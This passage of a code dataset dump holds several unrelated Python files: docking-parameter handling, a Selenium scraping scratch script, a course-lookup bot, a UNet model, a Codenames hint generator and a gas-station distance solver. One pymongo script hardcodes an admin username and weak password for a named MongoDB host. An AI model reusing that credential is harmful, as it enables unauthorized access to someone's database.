self._load_nested_target_keys_and_value_tuples_from_dataframe_row(row, identifier_prefix='parameters.', include_prefix=True)\n for nested_target_keys, value in nested_target_keys_and_value_tuples:\n parameters_dict = self._get_parameters_dict_with_next_step_reference_value_replaced(parameters_dict, nested_target_keys, new_ref=value, old_ref='^')\n\n #\n parameters_dict = self._get_parameters_dict_with_next_step_numerical_operators_applied(parameters_dict)\n\n #\n super().__init__(parameters_dict)\n\n @staticmethod\n def _get_parameters_dict_with_next_step_reference_value_replaced(parameters_dict: dict, nested_target_keys: List[str], new_ref: float, old_ref: str = '^') -> dict:\n \"\"\"Takes a set of parameters, finds the next nested step to be run, and, if it\n contains numerical operators, replaces the `reference_value` of the `target_key`\n with the specified float `new_ref` if `reference_value` matches the string\n 
`old_ref`.\"\"\"\n\n def traverse(obj):\n if isinstance(obj, dict):\n try:\n nested_target = get_nested_dict_item(obj, nested_target_keys)\n except KeyError:\n for key, value in obj.items():\n obj[key] = traverse(value)\n return obj\n if isinstance(nested_target, dict):\n if 'reference_value' in nested_target and 'arguments' in nested_target and 'operator' in nested_target: # numerical operator detected\n # replace old ref with new ref\n if nested_target['reference_value'] == old_ref:\n obj = set_nested_dict_item(obj, nested_target_keys + ['reference_value'], new_ref)\n else:\n if nested_target == old_ref:\n obj = set_nested_dict_item(obj, nested_target_keys, new_ref)\n return obj\n elif isinstance(obj, list): # obj is sequence\n obj[0] = traverse(obj[0]) # only change next step to be run, which will be found in the first element\n return obj\n else:\n return obj\n\n return traverse(deepcopy(parameters_dict))\n\n @staticmethod\n def _load_nested_target_keys_and_value_tuples_from_dataframe_row(row: pd.Series, identifier_prefix: str = 'parameters.', include_prefix: bool = False) -> List[Tuple[List[str], Union[float, str]]]:\n \"\"\"Loads the parameters in a dataframe row according to the column names.\"\"\"\n\n dic = row.to_dict()\n nested_target_keys_and_value_tuples = [(key.split('.'), value) for key, value in dic.items() if key.startswith(identifier_prefix)]\n\n if not include_prefix:\n nested_target_keys_and_value_tuples = [(x[0][1:], x[1]) for x in nested_target_keys_and_value_tuples]\n\n return nested_target_keys_and_value_tuples\n\n @staticmethod\n def _get_parameters_dict_with_next_step_numerical_operators_applied(parameters_dict: dict) -> dict:\n \"\"\"Takes a set of parameters, finds the next nested step to be run, and, if it\n contains numerical operators, applies them.\"\"\"\n\n def traverse(obj):\n if isinstance(obj, dict):\n if 'reference_value' in obj and 'arguments' in obj and 'operator' in obj: # numerical operator detected\n # apply operators\n if obj['operator'] == '+':\n obj = [float(obj['reference_value']) + float(x) for x in obj['arguments']]\n elif obj['operator'] == '-':\n obj = [float(obj['reference_value']) - float(x) for x in obj['arguments']]\n elif obj['operator'] == '*':\n obj = [float(obj['reference_value']) * float(x) for x in obj['arguments']]\n elif obj['operator'] == '/':\n obj = [float(obj['reference_value']) / float(x) for x in obj['arguments']]\n else:\n raise ValueError(\n f\"Witnessed operator `{obj['operator']}`. 
Only the following numerical operators are supported: `+`, `-`, `*`, `/`\")\n else:\n for key, value in obj.items():\n obj[key] = traverse(value)\n return obj\n elif isinstance(obj, list): # obj is sequence\n obj[0] = traverse(obj[0]) # only change next step to be run, which will be found in the first element\n return obj\n else:\n return obj\n\n return traverse(deepcopy(parameters_dict))\n","repo_name":"docking-org/pydock3","sub_path":"pydock3/dockopt/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"73240643113","text":"from selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nbinary = FirefoxBinary('C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe')\n\ndriver = webdriver.Firefox(firefox_binary=binary, executable_path=r'C:\\\\geckodriver.exe')\n\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom urllib.error import URLError\nfrom bs4 import BeautifulSoup\ntry:\n html = urlopen(\"https://www.python.org/\")\nexcept HTTPError as e:\n print(e)\nexcept URLError:\n print(\"Server down or incorrect domain\")\nelse:\n res = BeautifulSoup(html.read(),\"html5lib\")\n if res.title is None:\n print(\"Tag not found\")\n else:\n print(res.title)","repo_name":"diegooliveira7/Testes_Selenium_Python","sub_path":"scratch_1.py","file_name":"scratch_1.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4429498483","text":"from pymongo import MongoClient\n\nclient = MongoClient(\"mongodb://admin:123456@dreamatach.com:27017/\")\ncollection = client['blog']['article']\npipeline = [\n {\"$match\": {\"age\": {\"$gte\": \"25\"}}}\n]\nret = collection.aggregate(pipeline)\nfor x in ret:\n print(x)\n","repo_name":"alex90914/python_learn","sub_path":"mongo_test/mongo_query.py","file_name":"mongo_query.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44375643303","text":"import logging\nimport string\nimport re\nimport json\nimport sys\n\nfrom unibot.urlfetch import fetch\nfrom unibot.cache import cache_for\n\n\nQUERY_ALLOWED_CHARS = string.ascii_letters + string.digits + 'àèéìòù '\nQUERY_MIN_LENGTH = 4\nSCHEDULE_SUBDIR_URL = {'it': 'orario-lezioni', 'en': 'timetable'}\nEXAMS_SUBDIR_URL = {'it': 'appelli', 'en': 'exam-dates'}\nAVAILABLE_CURRICULA_URL = '@@available_curricula?anno={}&curricula='\nSCHEDULE_URL = {'json': '@@orario_reale_json?anno={}&curricula={}',\n 'html': '?anno={}&curricula={}'}\n\n\nclass QueryTooShortError(Exception):\n def __init__(self, query):\n super().__init__(\"Search query '{}' is too short\".format(query))\n\n\nclass CourseNotFoundError(Exception):\n def __init__(self, course_id):\n super().__init__(\"Course '{}' not found\".format(course_id))\n\n\nclass NotSupportedError(Exception):\n def __init__(self, course_id, reason):\n super().__init__(\"Course '{}' is not supported\".format(course_id))\n self.reason = reason\n\n\nclass Course:\n def __init__(self, course_id, title, lang, campus, url, parser='json', url_lastminute=None, supported=True, not_supported_reason=''):\n self.course_id = course_id\n self.title = title\n self.lang = lang\n self.campus = campus\n self.url = url\n self.parser = parser\n self.url_lastminute = url_lastminute\n self.supported = supported\n 
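# Editor's note: free-text explanation for unsupported courses; it is surfaced to callers via NotSupportedError.reason by the URL helpers below\n 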
self.not_supported_reason = not_supported_reason\n\n @property\n def search_name(self):\n return '{} - {} - {}'.format(self.title, self.course_id, self.campus)\n\n def is_supported(self):\n return self.supported\n\n def has_lastminute(self):\n return bool(self.url_lastminute)\n\n def get_url_curricula(self, year):\n if not self.supported:\n raise NotSupportedError(self.course_id, self.not_supported_reason)\n curricula_part = AVAILABLE_CURRICULA_URL.format(year)\n return '{}/{}/{}'.format(self.url, SCHEDULE_SUBDIR_URL[self.lang], curricula_part)\n\n def get_url_schedule(self, year, curricula=''):\n if not self.supported:\n raise NotSupportedError(self.course_id, self.not_supported_reason)\n schedule_part = SCHEDULE_URL[self.parser].format(year, curricula)\n return '{}/{}/{}'.format(self.url, SCHEDULE_SUBDIR_URL[self.lang], schedule_part)\n\n def get_url_exams(self):\n return '{}/{}'.format(self.url, EXAMS_SUBDIR_URL[self.lang])\n\n\nclass CourseRepo:\n def __init__(self, courses):\n self.courses = courses\n\n def get(self, course_id):\n match = next((c for c in self.courses if c.course_id == course_id), None)\n if not match:\n raise CourseNotFoundError(course_id)\n return match\n\n def search(self, query):\n query = ''.join(c if c not in string.punctuation else ' ' for c in query)\n query = ''.join(c for c in query if c in QUERY_ALLOWED_CHARS)\n query = ' '.join(query.split())\n if len(query) < QUERY_MIN_LENGTH:\n raise QueryTooShortError(query)\n query = query.replace(' ', '.*')\n regx = re.compile(query, flags=re.IGNORECASE)\n return [c for c in self.courses if regx.search(c.search_name)]\n\n\n@cache_for(minutes=30)\ndef get_courses():\n try:\n with open('assets/courses.json', 'r') as fp:\n courses = [course_factory(c) for c in json.load(fp)]\n return CourseRepo(courses)\n except Exception as e:\n logging.exception(e)\n sys.exit(1)\n\n\n@cache_for(minutes=60)\ndef get_curricula(course, year):\n return fetch(course.get_url_curricula(year)).json()\n\n\ndef course_factory(course):\n out = Course(course['id'], course['title'], course['lang'],\n course['campus'], course['url'])\n if 'supported' in course:\n out.supported = course['supported']\n out.not_supported_reason = course['not_supported_reason']\n if 'url_lastminute' in course:\n out.url_lastminute = course['url_lastminute']\n if 'parser' in course:\n out.parser = course['parser']\n return out\n","repo_name":"mattiamari/unibot","sub_path":"unibot/unibo/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"23210777198","text":"# full assembly of the sub-parts to form the complete net\n\nfrom .unet_parts import *\nimport numpy as np\nfrom .base_network import NetworkBase\n\nclass UNet(NetworkBase):\n def __init__(self, n_channels = 4, n_classes = 3):\n super(UNet, self).__init__()\n self._name = 'unet_generator'\n self.inc = inconv(n_channels, 64)\n self.down1 = down(64, 128)\n self.down2 = down(128, 256)\n self.down3 = down(256, 512)\n self.down4 = down(512, 512)\n self.up1 = up(1024, 256)\n self.up2 = up(512, 128)\n self.up3 = up(256, 64)\n self.up4 = up(128, 64)\n self.outc = outconv(64, n_classes)\n\n def forward(self, x_img, x_real_heatmap, x_desired_heatmap, desired_cond, fixed_noise):\n x_real_heatmap = x_real_heatmap.view(-1,1,128,128)\n x_input = torch.cat([x_img, x_real_heatmap], dim=1)\n # desired_cond = desired_cond.unsqueeze(2).unsqueeze(3)\n # desired_cond = 
desired_cond.expand(desired_cond.size(0), desired_cond.size(1), x_img.size(2), x_img.size(3))\n \n #x_input = torch.cat([x_img, desired_cond], dim=1)\n x1 = self.inc(x_input)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n x = self.outc(x)\n return x, x1","repo_name":"SonDaoDuy/GAN-for-face-rotation","sub_path":"networks/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28598322559","text":"# type: ignore\nimport itertools\nimport logging\nimport os\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import Dict, Iterable, List, Optional, Tuple\n\nimport community\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nfrom gensim.models import KeyedVectors\nfrom pandas import Series\n\nfrom codenames.game import Board, CardColor, Hint, Hinter, HinterGameState, WordGroup\nfrom codenames.solvers.naive.naive_hinter import (\n Proposal,\n default_proposal_grade_calculator,\n)\nfrom codenames.solvers.utils.algebra import cosine_distance, single_gram_schmidt\nfrom codenames.utils import RUN_ID, get_exports_folder\nfrom language_data.model_loader import load_language\n\nplt.style.use(\"fivethirtyeight\")\n\n\n@dataclass\nclass ForceNode:\n force_origin: np.array\n force_sign: bool\n force_size: Optional[float] = None\n\n\nlog = logging.getLogger(__name__)\nMIN_SELF_BLACK_DELTA = 0.07\nMIN_SELF_OPPONENT_DELTA = 0.04\nMIN_SELF_GRAY_DELTA = 0.01\nMAX_SELF_DISTANCE = 0.235\nOPPONENT_FORCE_CUTOFF = 0.275\nOPPONENT_FORCE_FACTOR = 1.6\nFRIENDLY_FORCE_CUTOFF = 0.2\nFRIENDLY_FORCE_FACTOR = 1\nBLACK_FORCE_FACTOR = 2\nGRAY_FORCE_FACTOR = 1.2\nEPSILON = 0.001\n\nBANNED_WORDS = {\"slackerjack\"}\nSimilarity = Tuple[str, float]\n\n\n# Test\n\n\ndef _invert_dict(original: dict) -> dict:\n inverted = {}\n for new_value, new_key in original.items():\n inverted.setdefault(new_key, [])\n inverted[new_key].append(new_value)\n return inverted\n\n\ndef should_filter_word(word: str, filter_expressions: Iterable[str]) -> bool:\n if \"_\" in word:\n return True\n if word in BANNED_WORDS:\n return True\n for bad_word in filter_expressions:\n if word in bad_word or bad_word in word:\n return True\n return False\n\n\ndef step_away(starting_point: np.array, step_away_from: np.array, arc_radians: float) -> np.array:\n cos_phase = (starting_point.T @ step_away_from) / (np.linalg.norm(step_away_from) * np.linalg.norm(starting_point))\n\n original_phase = np.arccos(np.clip(cos_phase, -1.0, 1.0))\n\n step_away_from, normed_o = single_gram_schmidt(step_away_from, starting_point)\n\n rotated = step_away_from * np.cos(original_phase + arc_radians) + normed_o * np.sin(original_phase + arc_radians)\n\n rotated_original_size = rotated * np.linalg.norm(starting_point)\n\n return rotated_original_size\n\n\ndef step_towards(starting_point: np.array, step_away_from: np.array, arc_radians: float) -> np.array:\n return step_away(starting_point, step_away_from, -arc_radians)\n\n\ndef sum_forces(starting_point: np.array, nodes) -> np.array: # : List[ForceNode,...]\n total_force = np.zeros(nodes[0].force_origin.shape)\n for node in nodes:\n rotated = step_away(starting_point, node.force_origin, node.force_size * EPSILON)\n contribution = rotated - starting_point\n np.set_printoptions(precision=6)\n total_force += 
contribution\n return total_force\n\n\ndef step_from_forces(\n starting_point: np.array, nodes, arc_radians: float\n) -> np.array: #: List[Tuple[np.array, float], ...]\n net_force = sum_forces(starting_point, nodes)\n force_size = np.linalg.norm(net_force)\n direction_vector = starting_point + net_force\n rotated = step_towards(starting_point, direction_vector, force_size * arc_radians / EPSILON)\n return rotated\n\n\ndef friendly_force(d):\n if d > FRIENDLY_FORCE_CUTOFF:\n return 0\n else:\n # Parabola with value 0 at d=0, 1 at d=FRIENDLY_FORCE_CUTOFF, and in between otherwise:\n return FRIENDLY_FORCE_FACTOR * (\n 1 - (d / FRIENDLY_FORCE_CUTOFF - 1) ** 2\n ) # FRIENDLY_FORCE_FACTOR * d / FRIENDLY_FORCE_CUTOFF\n\n\ndef repelling_force(d, cutoff_distance, factor):\n if d > cutoff_distance:\n return 0\n else:\n a = factor / (factor - 1) * cutoff_distance\n return a / (d + a / factor)\n\n\ndef opponent_force(d: float):\n return repelling_force(d, OPPONENT_FORCE_CUTOFF, OPPONENT_FORCE_FACTOR)\n\n\ndef gray_force(d):\n return repelling_force(d, OPPONENT_FORCE_CUTOFF, GRAY_FORCE_FACTOR)\n\n\ndef black_force(d):\n return repelling_force(d, OPPONENT_FORCE_CUTOFF, BLACK_FORCE_FACTOR)\n\n\ndef _format_word(word: str) -> str:\n return word.replace(\" \", \"_\").replace(\"-\", \"_\").strip()\n\n\n@dataclass\nclass Cluster:\n id: int\n df: pd.DataFrame\n centroid: Optional[np.array] = None\n grade: float = 0\n\n @property\n def words(self) -> WordGroup:\n return tuple(self.df.index)\n\n @property\n def default_centroid(self) -> np.array:\n mean = np.mean(self.df[\"vector_normed\"])\n normalized_mean = mean / np.linalg.norm(mean)\n return normalized_mean\n\n def update_distances(self):\n self.df[\"centroid_distance\"] = self.df[\"vector\"].apply(lambda v: cosine_distance(v, self.centroid))\n\n def sort_by_distances(self):\n self.df.sort_values(\"centroid_distance\", inplace=True)\n\n def reset(self):\n self.centroid = self.default_centroid\n self.update_distances()\n self.sort_by_distances()\n\n def __gt__(self, cluster_2):\n return self.grade > cluster_2.grade\n\n def __lt__(self, cluster_2):\n return self.grade < cluster_2.grade\n\n\nclass SnaHinter(Hinter):\n def __init__(self, name: str, debug_mode=False, physics_optimization=True):\n super().__init__(name=name)\n self.model: Optional[KeyedVectors] = None\n self.language_length: Optional[int] = None\n self.board_data: Optional[pd.DataFrame] = None\n self.graded_proposals: List[Cluster] = []\n self.debug_mode = debug_mode\n self.physics_optimization = physics_optimization\n self.game_state: Optional[HinterGameState] = None\n\n def on_game_start(self, language: str, board: Board):\n self.model = load_language(language=language) # type: ignore\n self.language_length = len(self.model.index_to_key)\n all_words = [_format_word(word) for word in board.all_words]\n vectors = self.model[all_words]\n vectors_list = list(vectors)\n vectors_list_normed = [v / np.linalg.norm(v) for v in vectors_list]\n self.board_data = pd.DataFrame(\n data={\n \"color\": board.all_colors,\n \"is_revealed\": board.all_reveals,\n \"vector\": vectors_list,\n \"vector_normed\": vectors_list_normed,\n \"cluster\": None,\n \"distance_to_centroid\": None,\n },\n index=board.all_words,\n )\n\n @property\n def unrevealed_cards(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"is_revealed\"] == False] # noqa: E712\n\n @property\n def own_unrevealed_cards(self) -> pd.DataFrame:\n own_unrevealed_idx = (self.board_data.is_revealed == False) & ( # noqa: E712\n self.board_data.color 
== self.team_color.as_card_color\n )\n return self.board_data[own_unrevealed_idx]\n\n @property\n def opponent_cards(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"color\"] == self.team_color.opponent.as_card_color]\n\n @property\n def gray_cards(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"color\"] == CardColor.GRAY]\n\n @property\n def own_cards(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"color\"] == self.team_color.as_card_color]\n\n @property\n def black_card(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"color\"] == CardColor.BLACK]\n\n @property\n def bad_cards(self) -> pd.DataFrame:\n return self.board_data[\n self.board_data[\"color\"].isin([CardColor.GRAY, CardColor.BLACK, self.team_color.opponent.as_card_color])\n ]\n\n def update_reveals(self, game_state):\n mapper = {card.word: card.revealed for card in game_state.board}\n self.board_data[\"is_revealed\"] = self.board_data.index.map(mapper)\n\n def pick_hint(self, game_state: HinterGameState) -> Hint:\n self.game_state = game_state\n self.update_reveals(game_state)\n graded_proposals = self.generate_graded_proposals()\n graded_proposals.sort(key=lambda p: -p.grade)\n best_n_repr = \"\\n\".join(str(p) for p in graded_proposals[:3])\n log.info(f\"Best proposals: \\n{best_n_repr}\")\n best_proposal = graded_proposals[0]\n # draw_cluster = Cluster(\n # -1,\n # self.board_data[self.board_data.index.isin(best_proposal.word_group)],\n # self.model.get_vector(best_proposal.hint_word),\n # )\n # self.draw_guesser_view(draw_cluster, best_proposal.hint_word, self.model.get_vector(best_proposal.hint_word))\n hint = Hint(best_proposal.hint_word, best_proposal.card_count)\n return hint\n\n def generate_graded_proposals(self, resolution_parameter=1):\n self.divide_to_clusters(df=self.own_unrevealed_cards, resolution_parameter=resolution_parameter)\n graded_proposals = []\n unique_clusters_ids = pd.unique(self.own_unrevealed_cards.cluster)\n for cluster_id in unique_clusters_ids:\n df = self.own_unrevealed_cards.loc[self.own_unrevealed_cards.cluster == cluster_id, :]\n cluster = Cluster(id=cluster_id, df=df.copy(deep=True))\n proposal = self.proposal_from_cluster(cluster)\n graded_proposals.append(proposal)\n draw_cluster = Cluster(\n -1,\n self.board_data[self.board_data.index.isin(proposal.word_group)],\n self.model.get_vector(proposal.hint_word),\n )\n self.draw_guesser_view(draw_cluster, proposal.hint_word, self.model.get_vector(proposal.hint_word))\n graded_proposals.sort(key=lambda c: -c.grade)\n return graded_proposals\n\n def proposal_from_cluster(self, cluster: Cluster):\n self.optimize_cluster(cluster)\n similarities: List[Similarity] = self.model.most_similar(cluster.centroid, topn=100)\n best_proposal = self.pick_best_similarity(\n similarities=similarities,\n words_to_filter_out=self.game_state.illegal_words,\n )\n return best_proposal\n\n def pick_best_similarity(\n self, similarities: List[Similarity], words_to_filter_out: Iterable[str]\n ) -> Optional[Proposal]:\n words_to_filter_out = {word.lower() for word in words_to_filter_out}\n filtered_proposals = []\n for similarity in similarities:\n word, grade = similarity\n word = word.lower()\n if should_filter_word(word, words_to_filter_out):\n continue\n vector = self.model.get_vector(word)\n proposal = self.proposal_from_word_vector(word, vector)\n filtered_proposals.append(proposal)\n if len(filtered_proposals) == 0:\n return None\n best_proposal = min(filtered_proposals, key=lambda p: -p.grade)\n return 
best_proposal\n\n def proposal_from_word_vector(self, word: str, vector: np.ndarray) -> Proposal:\n self.update_distances(vector)\n temp_df = self.unrevealed_cards.sort_values(\"distance_to_centroid\")\n centroid_to_black = np.min( # This min is required for the float type\n cosine_distance(vector, temp_df[temp_df[\"color\"] == CardColor.BLACK][\"vector\"])\n )\n centroid_to_gray = np.min(cosine_distance(vector, temp_df[temp_df[\"color\"] == CardColor.GRAY][\"vector\"]))\n centroid_to_opponent = np.min(\n cosine_distance(\n vector,\n temp_df[temp_df[\"color\"] == self.team_color.opponent.as_card_color][\"vector\"],\n )\n )\n\n bad_cards_limitation = np.min(\n [\n centroid_to_black - MIN_SELF_BLACK_DELTA,\n centroid_to_gray - MIN_SELF_GRAY_DELTA,\n centroid_to_opponent - MIN_SELF_OPPONENT_DELTA,\n ]\n )\n\n chosen_cards = temp_df[\n (temp_df[\"distance_to_centroid\"] < bad_cards_limitation)\n & (temp_df[\"distance_to_centroid\"] < MAX_SELF_DISTANCE)\n & (temp_df[\"color\"] == self.team_color.as_card_color)\n ]\n\n distance_group = np.max(chosen_cards[\"distance_to_centroid\"])\n\n if self.debug_mode is True:\n draw_cluster = Cluster(0, chosen_cards)\n draw_cluster.reset()\n self.draw_guesser_view(cluster=draw_cluster, word=word, vector=vector)\n\n proposal = Proposal(\n word_group=chosen_cards.index.to_list(),\n hint_word=word,\n hint_word_frequency=0,\n distance_group=distance_group,\n distance_gray=centroid_to_gray,\n distance_opponent=centroid_to_opponent,\n distance_black=centroid_to_black,\n )\n proposal.grade = default_proposal_grade_calculator(proposal)\n\n return proposal\n\n def force_from_color(self, centroid: np.ndarray, card_row: Series):\n vector, card_color = card_row[\"vector\"], card_row[\"color\"]\n d = cosine_distance(centroid, vector)\n if card_color == self.team_color.opponent.as_card_color:\n return opponent_force(d)\n elif card_color == CardColor.BLACK:\n return black_force(d)\n elif card_color == CardColor.GRAY:\n return gray_force(d)\n elif card_color == self.team_color.as_card_color:\n return friendly_force(d)\n else:\n raise ValueError(f\"color{card_row['color']} is not a valid color\")\n\n def board_df2nodes(self, centroid: np.array): # -> List[Tuple[np.array, float], ...]:\n relevant_df = self.board_data[self.board_data[\"is_revealed\"] == False] # noqa: E712\n relevant_df[\"force\"] = relevant_df.apply(lambda row: self.force_from_color(centroid, row), axis=1)\n relevant_df = relevant_df[[\"vector\", \"force\"]]\n tuples_list = list(relevant_df.itertuples(index=False, name=None))\n nodes_list = [\n ForceNode(force_origin=element[0], force_sign=True, force_size=element[1]) for element in tuples_list\n ]\n return nodes_list\n\n def optimization_break_condition(self, cluster: Cluster) -> bool:\n self.update_distances(cluster.centroid)\n distances2opponent = self.extract_centroid_distances(self.team_color.opponent.as_card_color)\n distances2own = self.extract_centroid_distances(self.team_color.as_card_color)\n distances2own = distances2own[distances2own.index.isin(cluster.df.index.to_list())]\n distance2black = self.extract_centroid_distances(CardColor.BLACK)\n distances2gray = self.extract_centroid_distances(CardColor.GRAY)\n max_distance2own = max(distances2own)\n if (\n (min(distances2opponent) - max_distance2own > MIN_SELF_OPPONENT_DELTA)\n and (distance2black[0] - max_distance2own > MIN_SELF_OPPONENT_DELTA)\n and (min(distances2gray) - max_distance2own > MIN_SELF_GRAY_DELTA)\n and (max_distance2own < MAX_SELF_DISTANCE)\n ):\n return True\n else:\n return 
False\n\n def optimize_cluster(self, cluster: Cluster) -> Cluster:\n cluster.reset()\n if self.debug_mode is True:\n self.draw_guesser_view(cluster)\n for i in range(100):\n self.clean_cluster(cluster)\n if self.debug_mode is True:\n self.draw_guesser_view(cluster)\n if self.optimization_break_condition(cluster):\n break\n if self.physics_optimization:\n nodes = self.board_df2nodes(cluster.centroid)\n cluster.centroid = step_from_forces(cluster.centroid, nodes, arc_radians=5e-2)\n if self.debug_mode is True:\n self.draw_guesser_view(cluster)\n return cluster\n\n def extract_centroid_distances(self, color: CardColor):\n relevant_df = self.board_data[self.board_data[\"is_revealed\"] == False] # noqa: E712\n if color == CardColor.GRAY:\n color_rows = relevant_df.color == CardColor.GRAY\n elif color == CardColor.BLACK:\n color_rows = relevant_df.color == CardColor.BLACK\n elif color == self.team_color.opponent.as_card_color:\n color_rows = relevant_df.color == self.team_color.opponent.as_card_color\n elif color == self.team_color.as_card_color:\n color_rows = relevant_df.color == self.team_color.as_card_color\n elif color == CardColor.BAD: # TODO: What is this?\n color_rows = relevant_df.color.isin(\n [CardColor.GRAY, CardColor.BLACK, self.team_color.opponent.as_card_color]\n )\n else:\n raise ValueError(f\"No such color as {color}\")\n return relevant_df.loc[color_rows, \"distance_to_centroid\"]\n\n def update_distances(self, centroid):\n self.board_data[\"distance_to_centroid\"] = self.board_data[\"vector\"].apply(\n lambda v: cosine_distance(v, centroid)\n )\n\n @staticmethod\n def clean_cluster(cluster: Cluster):\n cluster.update_distances()\n centroid_distances = cluster.df[\"centroid_distance\"]\n max_distance = max(centroid_distances)\n central_words = (centroid_distances < MAX_SELF_DISTANCE) | (centroid_distances != max_distance)\n cluster.df = cluster.df[central_words]\n cluster.centroid = cluster.default_centroid\n\n def draw_centroid_distances(self, ax, cluster: Cluster, centroid=None, title=None):\n if centroid is None:\n self.update_distances(cluster.centroid)\n else:\n self.update_distances(centroid)\n\n temp_df = self.unrevealed_cards.sort_values(\"distance_to_centroid\")\n temp_df[\"colors\"] = temp_df[\"color\"].apply(lambda x: x.value.lower())\n temp_df[\"is_in_cluster\"] = temp_df.index.isin(cluster.df.index)\n temp_df[\"edge_color\"] = temp_df[\"is_in_cluster\"].apply(lambda x: \"yellow\" if x else \"black\")\n temp_df[\"line_width\"] = temp_df[\"is_in_cluster\"].apply(lambda x: 3 if x else 1)\n\n ax.bar(\n x=temp_df.index,\n height=temp_df[\"distance_to_centroid\"],\n color=temp_df[\"colors\"],\n edgecolor=temp_df[\"edge_color\"],\n linewidth=temp_df[\"line_width\"],\n )\n plt.setp(ax.get_xticklabels(), rotation=45)\n ax.set_title(title)\n file_name = f\"{datetime.now().timestamp()}-{title}\"\n if file_name != \"no\":\n export_folder = get_exports_folder(\"sna\", RUN_ID)\n export_file = os.path.join(export_folder, file_name)\n temp_df.to_csv(f\"{export_file}.csv\")\n plt.savefig(f\"{export_file}.png\")\n plt.show()\n\n def draw_guesser_view(self, cluster: Cluster, word=None, vector=None):\n if word is None:\n fig, ax = plt.subplots(1, 1, figsize=(15, 8))\n self.draw_centroid_distances(ax, cluster, title=\"Cluster centroid\")\n else:\n fig, ax = plt.subplots(1, 1, figsize=(15, 8))\n self.draw_centroid_distances(ax, cluster, centroid=vector, title=f\"hint word: {word}\")\n # self.draw_centroid_distances(ax[1], cluster, title=\"Cluster centroid\")\n\n def 
divide_to_clusters(self, df: pd.DataFrame, resolution_parameter=1):\n vis_graph = nx.Graph()\n words = df.index.to_list()\n vis_graph.add_nodes_from(words)\n louvain = nx.Graph(vis_graph)\n for word_couple in itertools.combinations(words, 2):\n v, u = _format_word(word_couple[0]), _format_word(word_couple[1])\n distance = self.model.similarity(v, u) + 1\n if distance > 1.1:\n vis_graph.add_edge(v, u, weight=distance)\n louvain_weight = distance ** (2 * resolution_parameter)\n louvain.add_edge(v, u, weight=louvain_weight)\n\n word_to_group: Dict[str, int] = community.best_partition(louvain)\n self.board_data.cluster = self.board_data.index.map(word_to_group)\n","repo_name":"mkali-personal/codenames","sub_path":"codenames/solvers/sna_hinter.py","file_name":"sna_hinter.py","file_ext":"py","file_size_in_byte":19867,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"16245751187","text":"\"\"\"\nMinimum maximum distance between gas stations.\n\"\"\"\n\nimport heapq\n\n\nclass Solution:\n def __init__(self, arr: list[int]) -> None:\n self.arr: list[int] = arr\n self.n = len(self.arr)\n\n def minimize_max_distance(self, k: int) -> float:\n how_many: list[int] = [0] * (self.n - 1)\n for gas_station in range(1, k + 1):\n max_section: float = -1\n max_ind: int = -1\n for i in range(0, self.n - 1, 1):\n diff: int = self.arr[i + 1] - self.arr[i]\n section_length: float = diff / (how_many[i] + 1)\n\n if section_length > max_section:\n max_section = section_length\n max_ind = i\n\n how_many[max_ind] += 1\n\n max_ans: float = -1\n for i in range(0, self.n - 1, 1):\n diff: int = self.arr[i + 1] - self.arr[i]\n section_length: float = diff / (how_many[i] + 1)\n max_ans = max(max_ans, section_length)\n\n return max_ans\n\n def minimize_max_distance_better(self, k: int) -> float:\n how_many = [0] * (self.n - 1)\n pq = []\n # insert the first n-1 section lengths into pq\n # with respective distance values:\n for i in range(self.n - 1):\n heapq.heappush(pq, ((-1) * (self.arr[i + 1] - self.arr[i]), i))\n\n # pick and place the k gas station\n for gas_station in range(1, k + 1):\n # find the maximum section\n # and insert the gas station\n tp = heapq.heappop(pq)\n sec_ind = tp[1]\n\n # insert the current gas station\n how_many[sec_ind] += 1\n initial_diff = self.arr[sec_ind + 1] - self.arr[sec_ind]\n new_section_length = initial_diff / (how_many[sec_ind] + 1)\n heapq.heappush(pq, (new_section_length * (-1), sec_ind))\n\n return pq[0][0] * (-1)\n\n def numberOfGasStationsRequired(self, dist: int):\n cnt: int = 0\n for i in range(1, self.n):\n numberInBetween = (self.arr[i] - self.arr[i - 1]) // dist\n if (self.arr[i] - self.arr[i - 1]) == (dist * numberInBetween):\n numberInBetween -= 1\n cnt += numberInBetween\n return cnt\n\n def minimize_max_distance_optimal(self, k: int):\n low = 0\n high = 0\n\n # Find the maximum distance:\n for i in range(self.n - 1):\n high = max(high, self.arr[i + 1] - self.arr[i])\n\n # Apply Binary search:\n diff = 1e-6\n while high - low > diff:\n mid = (low + high) / 2.0\n cnt = self.numberOfGasStationsRequired(mid)\n if cnt > k:\n low = mid\n else:\n high = mid\n\n return high\n\n def print_arr(self) -> None:\n print(self.arr, sep=\" \")\n\n\nif __name__ == \"__main__\":\n # arr = [1, 13, 17, 23]\n arr = [1, 2, 3, 4, 5]\n solution = Solution(arr)\n solution.print_arr()\n print(solution.minimize_max_distance(5))\n print(solution.minimize_max_distance_better(5))\n print(type(1e-6))\n 